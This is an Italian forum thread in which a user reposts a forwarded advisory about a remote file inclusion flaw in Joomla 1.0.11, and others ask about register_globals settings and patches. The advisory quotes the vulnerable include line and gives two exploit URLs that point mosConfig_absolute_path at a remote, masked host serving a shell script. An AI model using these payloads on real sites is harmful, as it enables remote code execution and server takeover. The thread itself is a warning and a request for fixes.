Importantissimo!!! Nuovo Exploit su Joomla .11 !!!

[matthz]

Attenzione un amico mi ha inviato questa mail, a quanto pare hanno bucato anche quest'ultima versione di joomla!
Se qualcuno sa come patchare il sistema avverta al più presto!

Author : Super-Crystal
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==

website: http://www.joomla.org/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug : include_once ( $mosConfig_absolute_path . '/language/'.
$mosConfig_lang .'.php' );

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Exploit :
www.target.com/script_path/installation/index.php?mosConfig_absolute_path=ht
tp://***********/c-h.v2.txt?
------>
www.target.com/script_path/administrator/components/com_admin/admin.admin.ht
ml.php?mosConfig_absolute_path=http://***********/c-h.v2.txt?



Script Download
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_
0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Arab4Services Team  www.arab4services.com

[napo]

Com'è settato register_globals?
Sarà senz'altro a ON, se sono riusciti a sfondare.
Ma in quale file sarebbe il "bug"?

[matthz]

Dalle info delle impostazioni di Joomla io ce l'ho settato così:
                      (local master)
register_globals   Off   Off

[matthz]

No scusa, a me non hanno sfondato niente, ho solo segnalato un nuovo exploit, tutto lì. Non si sa mai... quando mi avvertono di queste cose mi preoccupo subito.
Non ti saprei dire di più, questo è tutto quello che mi hanno inviato (solo non ho postao l'url dove risiede lo script anche se è facile immaginarlo), infatti chiedo lumi.

[napo]

RG_EMULATION com'è settato?

[matthz]

define( 'RG_EMULATION', 0 );

Ma come ti ripeto, non mi hanno bucato, ho solo riportato una mail che mi hanno inviato per avvertirmi, e chiedevo lumi su eventuali patch, oltre che avvertira naturalmente.

[napo]

Però se non mi dici quale sarebbe il file vulnerabile, serve a poco.